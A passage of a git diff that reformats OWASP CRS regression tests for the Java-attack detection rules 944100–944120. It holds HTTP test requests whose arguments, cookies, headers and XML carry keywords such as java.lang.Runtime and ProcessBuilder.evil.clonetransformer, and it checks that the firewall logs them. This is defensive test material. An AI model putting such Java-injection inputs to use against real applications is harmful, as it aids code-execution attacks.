80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944100] + - test_id: 11 desc: XML element includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944100] + - test_id: 12 desc: XML attribute name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944100] + - test_id: 13 desc: XML attribute value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944100] + - test_id: 14 desc: XML element value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime" + output: + log: + expect_ids: [944100] + - test_id: 15 desc: XML element includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944100] + - test_id: 16 desc: XML attribute name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944100] + - test_id: 17 desc: XML attribute value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944100] + - test_id: 18 desc: XML element value includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder" + output: + log: + expect_ids: [944100] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml index ca0eef8c9..7cf19d15c 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml @@ -1,373 +1,371 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944110.yaml" - description: "Description" +rule_id: 944110 tests: - - test_title: 944110-1 + - test_id: 1 desc: Argument test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.Runtime" + output: + log: + expect_ids: [944110] + - test_id: 2 desc: Argument test includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.ProcessBuilder" - output: - log_contains: "id \"944110\"" - - test_title: 944110-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.ProcessBuilder" + output: + log: + expect_ids: [944110] + - test_id: 3 desc: Argument name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime=test" + output: + log: + expect_ids: [944110] + - test_id: 4 desc: Argument name includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder=test" - output: - log_contains: "id \"944110\"" - - test_title: 944110-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder=test" + output: + log: + expect_ids: [944110] + - test_id: 5 desc: Cookie test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 6 desc: Cookie test includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 7 desc: Cookie name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 8 desc: Cookie name includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.ProcessBuilder=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 9 desc: Request header test includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 10 desc: Request header test includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log: + expect_ids: [944110] + - test_id: 11 desc: XML element includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944110] + - test_id: 12 desc: XML attribute name includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944110] + - test_id: 13 desc: XML attribute value includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944110] + - test_id: 14 desc: XML element value includes keywords java. and Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.Runtime" - output: - log_contains: "id \"944110\"" - - test_title: 944110-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.Runtime" + output: + log: + expect_ids: [944110] + - test_id: 15 desc: XML element includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + log: + no_expect_ids: [944110] + - test_id: 16 desc: XML attribute name includes keyworda java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - test_title: 944110-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + no_expect_ids: [944110] + - test_id: 17 desc: XML attribute value includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - test_title: 944110-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + log: + expect_ids: [944110] + - test_id: 18 desc: XML element value includes keywords java. and ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.ProcessBuilder" - output: - log_contains: "id \"944110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.ProcessBuilder" + output: + log: + expect_ids: [944110] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml index b1c48a52e..f4b8e75e1 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944120.yaml @@ -1,2945 +1,2944 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944120.yaml" description: "Positive tests for rule 944120" +rule_id: 944120 tests: - - test_title: 944120-1 + - test_id: 1 desc: "Argument test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.clonetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.clonetransformer" + output: + log: + expect_ids: [944120] + - test_id: 2 desc: "Argument name includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.clonetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.clonetransformer=test" + output: + log: + expect_ids: [944120] + - test_id: 3 desc: "Cookie test includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 